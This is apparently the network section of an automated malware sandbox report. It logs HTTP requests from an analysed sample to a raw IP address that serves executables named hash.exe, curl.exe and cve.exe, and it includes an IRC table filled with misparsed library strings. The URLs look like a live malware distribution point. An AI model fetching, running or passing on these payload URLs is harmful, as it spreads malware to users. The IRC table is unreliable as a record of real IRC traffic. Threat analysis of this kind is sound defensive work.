Network Analysis
| IP Address | Status | Action |
|---|---|---|
| 45.137.64.40 | Active | Moloch |
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| No hosts contacted. | ||
GET
200
http://45.137.64.40/hash/hash.exe
REQUEST
RESPONSE
BODY
GET /hash/hash.exe HTTP/1.1
Host: 45.137.64.40
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 05 Aug 2024 02:08:03 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Tue, 08 Nov 2022 04:20:16 GMT
ETag: "7600-5eceddb684000"
Accept-Ranges: bytes
Content-Length: 30208
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
GET
200
http://45.137.64.40/hash/curl.exe
REQUEST
RESPONSE
BODY
GET /hash/curl.exe HTTP/1.1
Host: 45.137.64.40
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 05 Aug 2024 02:08:25 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Wed, 05 Jan 2022 04:50:52 GMT
ETag: "53ea48-5d4ce7f8f4300"
Accept-Ranges: bytes
Content-Length: 5499464
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
GET
200
http://45.137.64.40/hash/cve.exe
REQUEST
RESPONSE
BODY
GET /hash/cve.exe HTTP/1.1
Host: 45.137.64.40
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 05 Aug 2024 02:08:51 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Wed, 09 Nov 2022 16:26:33 GMT
ETag: "a8c046-5ed0c1ea3e040"
Accept-Ranges: bytes
Content-Length: 11059270
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
ICMP traffic
No ICMP traffic performed.
IRC traffic
| Command | Params | Type |
|---|---|---|
| CONNECT | phase completed!\x00%s cannot be done over CONNECT\x00allocate connect buffer!\x00Establish HTTP proxy tunnel to %s:%d\x00CONNECT\x001.0\x001.1\x00CONNECT %s HTTP/%s | client |
Suricata Alerts
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts